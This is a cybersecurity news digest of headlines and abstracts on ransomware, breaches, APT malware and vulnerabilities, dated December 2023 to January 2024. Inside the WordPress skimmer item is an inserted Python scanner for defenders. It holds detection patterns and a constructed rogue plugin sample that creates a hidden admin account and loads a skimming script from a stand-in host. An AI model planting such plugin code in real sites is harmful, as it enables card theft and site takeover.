Abstract A new exploitation technique called Simple Mail Transfer Protocol (SMTP) smuggling can be weaponized by threat actors to send spoofed emails with fake sender addresses while bypassing security measures. "Threat actors could abuse vulnerable SMTP servers worldwide to send malicious emails from arbitrary email addresses, allowing targeted phishing attacks," Timo Longin, a senior security consultant at SEC Consult, said in an analysis published last month. SMTP is a TCP/IP protocol used to send and receive email messages over a network. To relay a message from an email client (aka mail user agent), an SMTP connection is established between the client and server in order to transmit the actual content of the email. The server then relies on what's called a mail transfer agent (MTA) to check the domain of the recipient's email address, and if it's different from that of the sender, it queries the domain name system (DNS) to look up the MX (mail exchanger) rec

The Hacker News

January 3, 2024 – Outage

Hacktivists Shut Down Top State-Owned Belarusian News Agency Full Text

Abstract Belarusian hacktivist group, the Cyber-Partisans, launched a cyberattack on the country's leading state-owned media outlet, wiping the main website servers and backups, as a retaliatory measure against President Lukashenko's propaganda campaign.

Cyware

January 03, 2024 – Policy and Law

DOJ Slams XCast with $10 Million Fine Over Massive Illegal Robocall Operation Full Text

Abstract The U.S. Department of Justice (DoJ) on Tuesday said it reached a settlement with VoIP service provider XCast over allegations that it facilitated illegal telemarketing campaigns since at least January 2018, in contravention of the Telemarketing Sales Rule (TSR). In addition to prohibiting the company from violating the law, the stipulated order requires it to meet other compliance measures, including establishing a process for screening its customers and calling for potential illegal telemarketing. The order, which also imposes a $10 million civil penalty judgment, has been suspended due to XCast's inability to pay. "XCast provided VoIP services that transmitted billions of illegal robocalls to American consumers, including scam calls fraudulently claiming to be from government agencies," the DoJ said in a press release. These calls delivered prerecorded marketing messages, most of which were sent to numbers listed on the National Do Not Call Registry. To make matters worse,

The Hacker News

January 3, 2024 – Ransomware

Ban on Ransomware Payments? The Alternative Isn’t Working Full Text

Abstract Ransomware attacks in the US reached record levels in 2023, targeting hospitals, schools, government organizations, and private-sector businesses, costing victims an average of $1.5 million to rectify.

Cyware

January 3, 2024 – Breach

Defunct Ambulance Service Data Breach Impacts Nearly One Million People Full Text

Abstract Fallon Ambulance Services, a subsidiary of Transformative Healthcare, was targeted in a ransomware attack that exposed the personal information of nearly a million people. The attack occurred in February 2023 and was discovered in April 2023.

Cyware

January 2, 2024 – Breach

Inc Ransom Ransomware Gang Claims to Have Breached Xerox Corp Full Text

Abstract The Inc Ransom ransomware group has published several documents, including emails and an invoice, as proof of the hack. It is unclear how much data has been stolen from Xerox Corp.

Cyware

January 02, 2024 – Solution

The Definitive Enterprise Browser Buyer’s Guide Full Text

Abstract Security stakeholders have come to realize that the prominent role the browser has in the modern corporate environment requires a re-evaluation of how it is managed and protected. While not long ago web-borne risks were still addressed by a patchwork of endpoint, network, and cloud solutions, it is now clear that the partial protection these solutions provided is no longer sufficient. Therefore, more and more security teams are now turning to the emerging category of purpose-built enterprise browsers as the answer to the browser's security challenges. However, as this security solution category is still relatively new, there is not yet an established set of browser security best practices, nor common evaluation criteria. LayerX, the User-First Enterprise Browser Extension, is addressing security teams' need with the downloadable Enterprise Browser Buyer's Guide, which guides its readers through the essentials of choosing the best solution and provides them with an actionable

The Hacker News

January 2, 2024 – Ransomware

Zeppelin2 Ransomware Builder for Sale on Dark Web Full Text

Abstract A user on an underground forum is promoting the sale of Zeppelin2 ransomware, offering its source code and a cracked version of its builder tool. Zeppelin2 has been used since 2019, targeting various sectors including healthcare and technology.

Cyware

January 02, 2024 – Policy and Law

Google Settles $5 Billion Privacy Lawsuit Over Tracking Users in ‘Incognito Mode’ Full Text

Abstract Google has agreed to settle a lawsuit filed in June 2020 that alleged that the company misled users by tracking the browsing activity of people who thought that their internet use remained private when using the "incognito" or "private" mode on web browsers. The class-action lawsuit sought at least $5 billion in damages. The settlement terms were not disclosed. The plaintiffs had alleged that Google violated federal wiretap laws and tracked users' activity using Google Analytics to collect information when in private mode. They said this allowed the company to collect an "unaccountable trove of information" about users who assumed they had taken adequate steps to protect their privacy online. Google subsequently attempted to get the lawsuit dismissed, pointing out the message it displayed when users turned on Chrome's incognito mode, which informs users that their activity might still be visible to the websites they visit, their employer or school, or their internet service provider. It's w

The Hacker News

January 2, 2024 – Attack

Cactus Ransomware Gang Hit the Swedish Retail and Grocery Provider Coop Full Text

Abstract The Cactus ransomware group has claimed to have hacked Coop, one of the largest retail and grocery providers in Sweden. They are threatening to release a large amount of personal information.

Cyware

January 2, 2024 – Attack

Hackers Attack UK’s Nuclear Waste Services Through LinkedIn Full Text

Abstract The United Kingdom's Radioactive Waste Management (RWM) company recently experienced a cyberattack attempt through LinkedIn. Although the attack was unsuccessful, concerns have been raised about the security of critical nuclear infrastructure.

Cyware

January 2, 2024 – Breach

Pro-Palestinian Operation Claims Dozens of Data Breaches Against Israeli Firms Full Text

Abstract Pro-Palestinian hackers belonging to the group Cyber Toufan have successfully breached and leaked data from numerous Israeli entities, including foreign companies doing business with Israel.

Cyware

January 01, 2024 – Malware

New Variant of DLL Search Order Hijacking Bypasses Windows 10 and 11 Protections Full Text

Abstract Security researchers have detailed a new variant of a dynamic link library (DLL) search order hijacking technique that could be used by threat actors to bypass security mechanisms and achieve execution of malicious code on systems running Microsoft Windows 10 and Windows 11. The approach "leverages executables commonly found in the trusted WinSxS folder and exploits them via the classic DLL search order hijacking technique," cybersecurity firm Security Joes said in a new report exclusively shared with The Hacker News. In doing so, it allows adversaries to eliminate the need for elevated privileges when attempting to run nefarious code on a compromised machine as well as introduce potentially vulnerable binaries into the attack chain, as observed in the past. DLL search order hijacking, as the name implies, involves gaming the search order used to load DLLs in order to execute malicious payloads for purposes of defense evasion, persistence, and privilege escal

The Hacker News

January 01, 2024 – Vulnerabilities

New Terrapin Flaw Could Let Attackers Downgrade SSH Protocol Security Full Text

Abstract Security researchers from Ruhr University Bochum have discovered a vulnerability in the Secure Shell (SSH) cryptographic network protocol that could allow an attacker to downgrade the connection's security by breaking the integrity of the secure channel. Called Terrapin (CVE-2023-48795, CVSS score: 5.9), the exploit has been described as the "first ever practically exploitable prefix truncation attack." "By carefully adjusting the sequence numbers during the handshake, an attacker can remove an arbitrary amount of messages sent by the client or server at the beginning of the secure channel without the client or server noticing it," researchers Fabian Bäumer, Marcus Brinkmann, and Jörg Schwenk said. SSH is a method for securely sending commands to a computer over an unsecured network. It relies on cryptography to authenticate and encrypt connections between devices. This is accomplished by means of a handshake in which a client and server agree up

The Hacker News

January 01, 2024 – Malware

New JinxLoader Targeting Users with Formbook and XLoader Malware Full Text

Abstract A new Go-based malware loader called JinxLoader is being used by threat actors to deliver next-stage payloads such as Formbook and its successor XLoader. The disclosure comes from cybersecurity firms Palo Alto Networks Unit 42 and Symantec, both of which highlighted multi-step attack sequences that led to the deployment of JinxLoader through phishing attacks. "The malware pays homage to League of Legends character Jinx, featuring the character on its ad poster and [command-and-control] login panel," Symantec said. "JinxLoader's primary function is straightforward – loading malware." Unit 42 revealed in late November 2023 that the malware service was first advertised on hackforums[.]net on April 30, 2023, for $60 a month, $120 a year, or for a lifetime fee of $200. The attacks begin with phishing emails impersonating Abu Dhabi National Oil Company (ADNOC), urging recipients to open password-protected RAR archive attachments that, upon opening,

The Hacker News

December 30, 2023 – Malware

Info-Stealing Malware Now Includes Google Session Hijacking Full Text

Abstract Multiple malware-as-a-service info stealers now have the ability to manipulate authentication tokens to gain persistent access to a victim's Google account, even after the user has reset their password.

Cyware

December 30, 2023 – Phishing

Beware: Scam-as-a-Service Aiding Cybercriminals in Crypto Wallet-Draining Attacks Full Text

Abstract Cybersecurity researchers are warning about an increase in phishing attacks that are capable of draining cryptocurrency wallets. "These threats are unique in their approach, targeting a wide range of blockchain networks, from Ethereum and Binance Smart Chain to Polygon, Avalanche, and almost 20 other networks by using a crypto wallet-draining technique," Check Point researchers Oded Vanunu, Dikla Barda, and Roman Zaikin said. A prominent contributor to this troubling trend is a notorious phishing group called Angel Drainer, which advertises a "scam-as-a-service" offering by charging a percentage of the stolen amount, typically 20% or 30%, from its collaborators in return for providing wallet-draining scripts and other services. In late November 2023, a similar wallet-draining service known as Inferno Drainer announced that it was shutting down its operations for good after helping scammers plunder over $70 million worth of crypto from 103,676 victims sinc

The Hacker News

December 29, 2023 – Outage

Computer Systems at Massachusetts-Based Anna Jaques Hospital Compromised After Cyberattack Full Text

Abstract Anna Jaques Hospital's health record system was shut down due to a cyberattack, causing delays in receiving services and diverting ambulance arrivals. The hospital is working with cybersecurity professionals to investigate the attack.

Cyware

December 29, 2023 – Attack

Albanian Parliament and One Albania Telecom Hit by Cyber Attacks Full Text

Abstract The Assembly of the Republic of Albania and telecom company One Albania have been targeted by cyber attacks, the country's National Authority for Electronic Certification and Cyber Security (AKCESK) revealed this week. "These infrastructures, under the legislation in force, are not currently classified as critical or important information infrastructure," AKCESK said. One Albania, which has nearly 1.5 million subscribers, said in a Facebook post on December 25 that it had handled the security incident without any issues and that its services, including mobile, landline, and IPTV, remained unaffected. AKCESK further noted that the intrusions did not originate from Albanian IP addresses, adding it managed to "identify potential cases in real-time." The agency also said that it has been focusing its efforts on identifying the source of the attacks, recovering compromised systems, and implementing security measures to prevent such incidents from happening again in the future.

The Hacker News

December 29, 2023 – Privacy

With Car Privacy Concerns Rising, Automakers May Be on Road to Regulation Full Text

Abstract Regulators, particularly the California Privacy Protection Agency and the Federal Trade Commission, are starting to investigate and potentially take action against connected vehicle manufacturers for privacy violations.

Cyware

December 29, 2023 – Government

CERT-UA Uncovers New Malware Wave Distributing OCEANMAP, MASEPIE, STEELHOOK Full Text

Abstract The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign orchestrated by the Russia-linked APT28 group to deploy previously undocumented malware such as OCEANMAP, MASEPIE, and STEELHOOK to harvest sensitive information. The activity, which was detected by the agency between December 15 and 25, 2023, targets government entities with email messages urging recipients to click on a link to view a document. However, to the contrary, the links redirect to malicious web resources that abuse JavaScript and the "search-ms:" URI protocol handler to drop a Windows shortcut file (LNK) that launches PowerShell commands to activate an infection chain for a new malware known as MASEPIE. MASEPIE is a Python-based tool to download/upload files and execute commands, with communications with the command-and-control (C2) server taking place over an encrypted channel using the TCP protocol. The attacks further pave the way for the deployment of a

The Hacker News

December 29, 2023 – Policy and Law

Google to Settle Class Action Lawsuit Alleging Incognito Mode Does Not Protect User Privacy Full Text

Abstract Google has reached a preliminary settlement in a class-action lawsuit accusing the company of deceiving users about their privacy while using the Incognito mode. The settlement comes after a nearly four-year legal battle.

Cyware

December 29, 2023 – Phishing

Kimsuky Hackers Deploying AppleSeed, Meterpreter, and TinyNuke in Latest Attacks Full Text

Abstract Nation-state actors affiliated with North Korea have been observed using spear-phishing attacks to deliver an assortment of backdoors and tools such as AppleSeed, Meterpreter, and TinyNuke to seize control of compromised machines. South Korea-based cybersecurity company AhnLab attributed the activity to an advanced persistent threat group known as Kimsuky. "A notable point about attacks that use AppleSeed is that similar methods of attack have been used for many years with no significant changes to the malware that are used together," the AhnLab Security Emergency Response Center (ASEC) said in an analysis published Thursday. Kimsuky, active for over a decade, is known for its targeting of a wide range of entities in South Korea, before expanding its focus to include other geographies in 2017. It was sanctioned by the U.S. government late last month for amassing intelligence to support North Korea's strategic objectives. The threat actor's espionage campaigns are realized th

The Hacker News

December 29, 2023 – Outage

Update: Operational Halt at First American Financial Corporation, Subsidiary After Cyberattack Full Text

Abstract The company is working to restore its operations and has notified regulatory authorities. Despite the disruption, the company is still able to close loans and accept payments.

Cyware

December 29, 2023 – General

Do the Casino Ransomware Attacks Make the Case to Pay? Full Text

Abstract Experts caution that the decision to pay or not pay depends on various factors, including the type of data compromised, the availability of backups, the financial impact on the organization, and the sector in which the company operates.

Cyware

December 29, 2023 – Vulnerabilities

Microsoft Disables MSIX App Installer Protocol Widely Used in Malware Attacks Full Text

Abstract Microsoft on Thursday said it's once again disabling the ms-appinstaller protocol handler by default following its abuse by multiple threat actors to distribute malware. "The observed threat actor activity abuses the current implementation of the ms-appinstaller protocol handler as an access vector for malware that may lead to ransomware distribution," the Microsoft Threat Intelligence team said. It further noted that several cybercriminals are offering a malware kit for sale as a service that leverages the MSIX file format and ms-appinstaller protocol handler. The changes have gone into effect in App Installer version 1.21.3421.0 or higher. The attacks take the form of signed malicious MSIX application packages that are distributed via Microsoft Teams or malicious advertisements for legitimate popular software on search engines like Google. At least four different financially motivated hacking groups have been observed taking advantage of the App Installer service since mi

The Hacker News

December 28, 2023 – Outage

Trinidad and Tobago Social Security Agency Discloses Post-Christmas Ransomware Attack Full Text

Abstract The National Insurance Board in Trinidad and Tobago has been hit by a ransomware attack, leading to the closure of its offices and limiting its operations for an extended period.

Cyware

December 28, 2023 – Vulnerabilities

Google Cloud Resolves Privilege Escalation Flaw Impacting Kubernetes Service Full Text

Abstract Google Cloud has addressed a medium-severity security flaw in its platform that could be abused by an attacker who already has access to a Kubernetes cluster to escalate their privileges. "An attacker who has compromised the Fluent Bit logging container could combine that access with high privileges required by Anthos Service Mesh (on clusters that have enabled it) to escalate privileges in the cluster," the company said as part of an advisory released on December 14, 2023. Palo Alto Networks Unit 42, which discovered and reported the shortcoming, said adversaries could weaponize it to carry out "data theft, deploy malicious pods, and disrupt the cluster's operations." There is no evidence that the issue has been exploited in the wild. It has been addressed in the following versions of Google Kubernetes Engine (GKE) and Anthos Service Mesh (ASM): 1.25.16-gke.1020000, 1.26.10-gke.1235000, 1.27.7-gke.1293000, 1.28.4-gke.1083000, 1.17.8-asm.8, 1.18.

The Hacker News

December 28, 2023 – Attack

Albanian Parliament, Telecom Company Hit by Cyberattacks Full Text

Abstract The Albanian parliament and a telecom company were targeted by cyberattacks originating from outside Albania. The attacks, which attempted to interfere with infrastructure and delete data, have not been attributed to a specific threat actor.

Cyware

December 28, 2023 – Attack

Most Sophisticated iPhone Hack Ever Exploited Apple’s Hidden Hardware Feature Full Text

Abstract The Operation Triangulation spyware attacks targeting Apple iOS devices leveraged never-before-seen exploits that made it possible to even bypass pivotal hardware-based security protections erected by the company. Russian cybersecurity firm Kaspersky, which discovered the campaign at the beginning of 2023 after becoming one of the targets, described it as the "most sophisticated attack chain" it has ever observed to date. The campaign is believed to have been active since 2019. The exploitation activity involved the use of four zero-day flaws that were fashioned into a chain to obtain an unprecedented level of access and backdoor target devices running iOS versions up to iOS 16.2 with the ultimate goal of gathering sensitive information. The starting point of the zero-click attack is an iMessage bearing a malicious attachment, which is automatically processed sans any user interaction to ultimately obtain elevated permissions and deploy a spyware module. Specific

The Hacker News

December 28, 2023 – Malware

Four-Year Campaign Backdoored iPhones Using Undocumented Hardware Function Full Text

Abstract The secret hardware function targeted by the attackers allowed them to bypass advanced memory protections, enabling post-exploitation techniques and compromising system integrity.

Cyware

December 28, 2023 – Malware

New Rugmi Malware Loader Surges with Hundreds of Daily Detections Full Text

Abstract A new malware loader is being used by threat actors to deliver a wide range of information stealers such as Lumma Stealer (aka LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms. Cybersecurity firm ESET is tracking the trojan under the name Win/TrojanDownloader.Rugmi. "This malware is a loader with three types of components: a downloader that downloads an encrypted payload, a loader that runs the payload from internal resources, and another loader that runs the payload from an external file on the disk," the company said in its Threat Report H2 2023. Telemetry data gathered by the company shows that detections for the Rugmi loader spiked in October and November 2023, surging from single digit daily numbers to hundreds per day. Stealer malware is typically sold under a malware-as-a-service (MaaS) model to other threat actors on a subscription basis. Lumma Stealer, for instance, is advertised in underground forums for $250 a month. The most expen

The Hacker News

December 28, 2023 – Vulnerabilities

Three Main Tactics Attackers Use to Bypass MFA Full Text

Abstract SE Labs has warned that multi-factor authentication (MFA) is not foolproof and can be bypassed by attackers using old-school methods such as social engineering, malware, and phishing.

Cyware

December 28, 2023 – Insider Threat

How to Incorporate Human-Centric Security Full Text

Abstract Companies need to shift their focus from solely addressing threats to proactively mitigating risks by analyzing behaviors and implementing insider risk management solutions.

Cyware

December 27, 2023 – Vulnerabilities

Critical Zero-Day in Apache OfBiz ERP System Exposes Businesses to Attack Full Text

Abstract A new zero-day security flaw has been discovered in Apache OfBiz, an open-source Enterprise Resource Planning (ERP) system, that could be exploited to bypass authentication protections. The vulnerability, tracked as CVE-2023-51467, resides in the login functionality and is the result of an incomplete patch for another critical vulnerability (CVE-2023-49070, CVSS score: 9.8) that was released earlier this month. "The security measures taken to patch CVE-2023-49070 left the root issue intact and therefore the authentication bypass was still present," the SonicWall Capture Labs threat research team, which discovered the bug, said in a statement shared with The Hacker News. CVE-2023-49070 refers to a pre-authenticated remote code execution flaw impacting versions prior to 18.12.10 that, when successfully exploited, could allow threat actors to gain full control over the server and siphon sensitive data. It is caused by a deprecated XML-RPC component within Apache

The Hacker News

December 27, 2023 – Attack

Chinese Hackers Exploited New Zero-Day in Barracuda’s ESG Appliances Full Text

Abstract Barracuda has revealed that Chinese threat actors exploited a new zero-day in its Email Security Gateway (ESG) appliances to deploy backdoors on a "limited number" of devices. Tracked as CVE-2023-7102, the issue relates to a case of arbitrary code execution that resides within a third-party and open-source library named Spreadsheet::ParseExcel that's used by the Amavis scanner within the gateway to screen Microsoft Excel email attachments for malware. The company attributed the activity to a threat actor tracked by Google-owned Mandiant as UNC4841, which was previously linked to the active exploitation of another zero-day in Barracuda devices (CVE-2023-2868, CVSS score: 9.8) earlier this year. Successful exploitation of the new flaw is accomplished by means of a specially crafted Microsoft Excel email attachment. This is followed by the deployment of new variants of known implants called SEASPY and SALTWATER that are equipped to offer persistence and comman

The Hacker News

December 27, 2023 – Malware

New Sneaky Xamalicious Android Malware Hits Over 327,000 Devices Full Text

Abstract A new Android backdoor has been discovered with potent capabilities to carry out a range of malicious actions on infected devices. Dubbed Xamalicious by the McAfee Mobile Research Team, the malware is so named for the fact that it's developed using an open-source mobile app framework called Xamarin and abuses the operating system's accessibility permissions to fulfill its objectives. It's also capable of gathering metadata about the compromised device and contacting a command-and-control (C2) server to fetch a second-stage payload, but only after determining if it fits the bill. The second stage is "dynamically injected as an assembly DLL at runtime level to take full control of the device and potentially perform fraudulent actions such as clicking on ads, installing apps, among other actions financially motivated without user consent," security researcher Fernando Ruiz said. The cybersecurity firm said it identified 25 apps that come with this active thr

The Hacker News

December 26, 2023 – Vulnerabilities

Ubuntu Security Updates Fixed Vim Vulnerabilities Full Text

Abstract The vulnerabilities range from denial of service risks to arbitrary code execution possibilities. The advisory emphasizes the importance of regularly updating Vim and applying security patches to mitigate these risks.

Cyware

December 26, 2023 – Malware

Carbanak Banking Malware Resurfaces with New Ransomware Tactics Full Text

Abstract The banking malware known as  Carbanak  has been observed being used in  ransomware attacks  with updated tactics. "The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group  said  in an analysis of ransomware attacks that took place in November 2023. "Carbanak returned last month through new distribution chains and has been distributed through compromised websites to impersonate various business-related software." Some of the impersonated tools include popular business-related software such as HubSpot, Veeam, and Xero. Carbanak , detected in the wild since at least 2014, is known for its data exfiltration and remote control features. Starting off as a banking malware, it has been put to use by the  FIN7 cybercrime syndicate . In the latest attack chain documented by NCC Group, the compromised websites are designed to host malicious installer files masquerading as legitimate utilities to

The Hacker News

December 26, 2023 – Breach

Mobile Virtual Network Operator Mint Mobile Discloses a Data Breach Full Text

Abstract The breach exposed customers' names, phone numbers, email addresses, SIM serial numbers, IMEI numbers, and service plan information. Importantly, financial data and passwords were not exposed in the breach.

Cyware

December 26, 2023 – Business

Mend.io Acquires Cyber Startup Atom Security Full Text

Abstract The integration of Atom Security's technology into Mend.io's product line is expected to enhance coverage and reduce the number of irrelevant findings in code vulnerabilities.

Cyware

December 26, 2023 – Breach

Video Game Giant Ubisoft Investigates Reports of a Data Breach Full Text

Abstract On December 20, an unknown threat actor had access to Ubisoft's infrastructure for 48 hours. The attackers attempted to steal user data from the game R6 Siege but were unsuccessful.

Cyware

December 26, 2023 – Malware

Stealth Android Backdoor Xamalicious Found Actively Infecting Devices Full Text

Abstract The Xamalicious backdoor, implemented with Xamarin, targets Android devices by gaining accessibility privileges and communicating with a C2 server to download a second-stage payload, potentially enabling fraudulent actions without user consent.

Cyware

December 26, 2023 – Malware

Nim-based Malware Distributed Using Microsoft Word Docs Impersonating the Nepali Government Full Text

Abstract The Nim-based backdoor communicates with command and control servers, evades analysis tools, and establishes persistence on the compromised machine through startup folders and scheduled tasks.

Cyware

December 26, 2023 – Phishing

The Rising Threat of Phishing Attacks with Crypto Drainers Full Text

Abstract The "Angel Drainer" phishing group is notorious for draining cryptocurrency wallets through sophisticated schemes, charging a percentage of the stolen amount from hackers.

Cyware

December 25, 2023 – Phishing

Cloud Atlas’ Spear-Phishing Attacks Target Russian Agro and Research Companies Full Text

Abstract The threat actor referred to as  Cloud Atlas  has been linked to a set of spear-phishing attacks on Russian enterprises. Targets included a Russian agro-industrial enterprise and a state-owned research company, according to a  report  from F.A.C.C.T., a standalone cybersecurity company formed after Group-IB's formal exit from Russia earlier this year. Cloud Atlas, active since at least 2014, is a cyber espionage group of unknown origin. Also called Clean Ursa, Inception, Oxygen, and Red October, the threat actor is known for its persistent campaigns targeting Russia, Belarus, Azerbaijan, Turkey, and Slovenia. In December 2022, Check Point and Positive Technologies  detailed  multi-stage attack sequences that led to the deployment of a PowerShell-based backdoor referred to as PowerShower as well as DLL payloads capable of communicating with an actor-controlled server. The starting point is a phishing message bearing a lure document that exploits  CVE-2017-11882 , a six-year-ol

The Hacker News

December 24, 2023 – Policy and Law

British LAPSUS$ Teen Members Sentenced for High-Profile Attacks Full Text

Abstract Two British teens part of the LAPSUS$ cyber crime and extortion gang have been sentenced for their roles in orchestrating a string of high-profile attacks against a number of companies. Arion Kurtaj, an 18-year-old from Oxford, has been sentenced to an indefinite hospital order due to his intent to get back to cybercrime "as soon as possible," BBC  reported . Kurtaj, who is autistic, was deemed unfit to stand trial. Another LAPSUS$ member, a 17-year-old unnamed minor, was sentenced to an 18-month-long Youth Rehabilitation Order, including a three-month intensive supervision and surveillance requirement. He was found guilty of two counts of fraud, two Computer Misuse Act offenses, and one count of blackmail. Both defendants  were initially arrested in January 2022, and then released under investigation. They were re-arrested in March 2022. While Kurtaj was later granted bail, he continued to attack various companies until he was arrested again in September. The attack sp

The Hacker News

December 23, 2023 – Vulnerabilities

ESET Fixed a High-Severity Bug in the Secure Traffic Scanning Feature of Several Products Full Text

Abstract The vulnerability was due to improper validation of server certificates, allowing browsers to trust sites with certificates signed with outdated algorithms. ESET has released security patches and is not aware of any attacks exploiting this flaw.

Cyware

December 23, 2023 – Breach

Real Estate Agency Exposes Details of 690K Customers in Dubai Full Text

Abstract The leaked data included personal information such as names, emails, phone numbers, and scanned copies of receipts, checks, contracts, and IDs, increasing the likelihood of targeted scams and unauthorized access to sensitive accounts.

Cyware

December 23, 2023 – Malware

Bandook - A Persistent Threat That Keeps Evolving Full Text

Abstract Bandook malware, a remote access trojan, has evolved with a new variant that uses a PDF file to distribute its payload and injects it into msinfo32.exe, allowing remote attackers to gain control of infected systems.

Cyware

December 23, 2023 – Attack

Ukrainian Hackers Claim Attack on Popular Russian CRM Provider Full Text

Abstract A group of Ukrainian hackers known as the IT Army claimed responsibility for disrupting the operations of Bitrix24, a Russian provider of customer relationship management (CRM) services.

Cyware

December 23, 2023 – Policy and Law

Online Platform Carousell Violated Hong Kong Privacy Laws, Watchdog Finds Full Text

Abstract The violation comes after the personal data of over 320,000 local users was discovered being sold on the dark web. Carousell reported the incident last year, attributing it to a loophole exploited by hackers in its system migration process.

Cyware

December 23, 2023 – Phishing

Cyber-Espionage Group Cloud Atlas Targets Russian Companies With War-Related Phishing Attacks Full Text

Abstract The hacker group known as Cloud Atlas has recently targeted a Russian agro-industrial enterprise and a state-owned research company in an espionage campaign. The group, believed to be state-backed, primarily attacks Russia and surrounding countries.

Cyware

December 22, 2023 – Malware

Rogue WordPress Plugin Exposes E-Commerce Sites to Credit Card Theft Full Text

Abstract Threat hunters have discovered a rogue WordPress plugin that's capable of creating bogus administrator users and injecting malicious JavaScript code to steal credit card information. The skimming activity is part of a  Magecart campaign  targeting e-commerce websites, according to Sucuri. "As with many other malicious or fake WordPress plugins it contains some deceptive information at the top of the file to give it a veneer of legitimacy," security researcher Ben Martin  said . "In this case, comments claim the code to be 'WordPress Cache Addons.'" Malicious plugins typically find their way to WordPress sites via either a  compromised admin user  or the  exploitation of security flaws  in another plugin already installed on the site. Post installation, the plugin replicates itself to the  mu-plugins  (or must-use plugins) directory so that it's automatically enabled and conceals its presence from the admin panel. "Since the only way to re

The Hacker News
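The abstract above describes a plugin that hides in the mu-plugins directory, creates an administrator account and injects a remote script. The following Python scanner is an added example (not Sucuri's code and not the plugin described): it walks wp-content/mu-plugins and flags PHP files whose contents do things a self-described cache add-on has no reason to do. The indicator patterns, file names and sample plugin sources are constructed assumptions, so treat the list as a starting point rather than a signature set.

```python
"""Scan a WordPress mu-plugins directory for indicators of a rogue plugin.

Added example, not code from Sucuri or from the plugin the report describes.
The indicator patterns are assumptions about what a plugin that claims to be
a cache add-on has no reason to do; the sample files are constructed.
"""
import re
import tempfile
from pathlib import Path

# Assumed indicators, keyed by what the matched PHP would accomplish.
INDICATORS = {
    "creates_user": re.compile(r"\b(wp_create_user|wp_insert_user)\s*\("),
    "grants_admin": re.compile(r"""set_role\s*\(\s*['"]administrator['"]"""),
    "obfuscation": re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\("),
    "injects_script": re.compile(r"""<script[^>]+src=['"]https?://""", re.I),
    "hides_from_admin": re.compile(r"""add_filter\s*\(\s*['"]all_plugins['"]"""),
}

# Constructed rogue mu-plugin: a legitimate-looking header over user creation,
# script injection and self-concealment.
ROGUE = """<?php
/*
Plugin Name: WordPress Cache Addons
Description: Page cache helpers
*/
add_action('init', function () {
    $u = wp_create_user('cachesupport', 'p4ss', 'x@example.invalid');
    $user = new WP_User($u);
    $user->set_role('administrator');
});
add_action('wp_head', function () {
    echo '<script src="https://cdn.example.invalid/skim.js"></script>';
});
add_filter('all_plugins', function ($p) {
    unset($p['cache-addons/cache-addons.php']);
    return $p;
});
"""

# Constructed benign mu-plugin for contrast.
BENIGN = """<?php
/*
Plugin Name: Site Maintenance Notice
*/
add_filter('the_content', function ($c) { return $c; });
"""


def scan_mu_plugins(wp_content):
    """Return one finding per PHP file under mu-plugins that trips any indicator."""
    findings = []
    mu_dir = Path(wp_content) / "mu-plugins"
    if not mu_dir.is_dir():
        return findings
    for php in sorted(mu_dir.rglob("*.php")):
        src = php.read_text(errors="replace")
        header = re.search(r"Plugin Name:\s*(.+)", src)
        hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
        if hits:
            findings.append({
                "file": str(php.relative_to(wp_content)),
                # The header comment is whatever the author wrote; it proves nothing.
                "claimed_name": header.group(1).strip() if header else None,
                "indicators": hits,
            })
    return findings


def demo():
    """Build a constructed wp-content tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        wp_content = Path(tmp) / "wp-content"
        mu = wp_content / "mu-plugins"
        mu.mkdir(parents=True)
        (mu / "maintenance-notice.php").write_text(BENIGN)
        (mu / "cache-addons.php").write_text(ROGUE)
        return scan_mu_plugins(wp_content)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Because mu-plugins are loaded unconditionally, a match here should be followed by listing administrator accounts and checking their creation dates, not just by deleting the file.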

December 22, 2023 – Malware

Operation RusticWeb: Rust-Based Malware Targets Indian Government Entities Full Text

Abstract Indian government entities and the defense sector have been targeted by a phishing campaign that's engineered to drop Rust-based malware for intelligence gathering. The activity, first detected in October 2023, has been codenamed  Operation RusticWeb  by enterprise security firm SEQRITE. "New Rust-based payloads and encrypted PowerShell commands have been utilized to exfiltrate confidential documents to a web-based service engine, instead of a dedicated command-and-control (C2) server," security researcher Sathwik Ram Prakki  said . Tactical overlaps have been uncovered between the cluster and those widely tracked under the monikers  Transparent Tribe  and SideCopy, both of which are assessed to be linked to Pakistan. SideCopy is also a suspected subordinate element within Transparent Tribe. Last month, SEQRITE  detailed  multiple campaigns undertaken by the threat actor targeting Indian government bodies to deliver numerous trojans such as AllaKore RAT, Ares RAT, an

The Hacker News

December 22, 2023 – Phishing

Decoy Microsoft Word Documents Used to Deliver Nim-Based Malware Full Text

Abstract A new phishing campaign is leveraging decoy Microsoft Word documents as bait to deliver a backdoor written in the  Nim programming language . "Malware written in uncommon programming languages puts the security community at a disadvantage as researchers and reverse engineers' unfamiliarity can hamper their investigation," Netskope researchers Ghanashyam Satpathy and Jan Michael Alcantara  said . Nim-based malware has been a rarity in the threat landscape, although that has been slowly changing in recent years as attackers continue to either develop custom tools from scratch using the language or port existing versions of their nefarious programs to it. This has been demonstrated in the case of loaders such as  NimzaLoader ,  Nimbda ,  IceXLoader , as well as ransomware families tracked under the names  Dark Power  and  Kanti . The attack chain documented by Netskope begins with a phishing email containing a Word document attachment that, when opened, urges the recipi

The Hacker News

December 22, 2023

UAC-0099 Using WinRAR Exploit to Target Ukrainian Firms with LONEPAGE Malware Full Text

Abstract The threat actor known as  UAC-0099  has been linked to continued attacks aimed at Ukraine, some of which leverage a high-severity flaw in the WinRAR software to deliver a malware strain called LONEPAGE. "The threat actor targets Ukrainian employees working for companies outside of Ukraine," cybersecurity firm Deep Instinct  said  in a Thursday analysis. UAC-0099 was  first documented  by the Computer Emergency Response Team of Ukraine (CERT-UA) in June 2023, detailing its attacks against state organizations and media entities for espionage motives. The attack chains leveraged phishing messages containing HTA, RAR, and LNK file attachments that led to the deployment of  LONEPAGE , a Visual Basic Script (VBS) malware that's capable of contacting a command-and-control (C2) server to retrieve additional payloads such as keyloggers, stealers, and screenshot malware. "During 2022-2023, the mentioned group received unauthorized remote access to several dozen computer

The Hacker News

December 22, 2023

Microsoft Warns of New ‘FalseFont’ Backdoor Targeting the Defense Sector Full Text

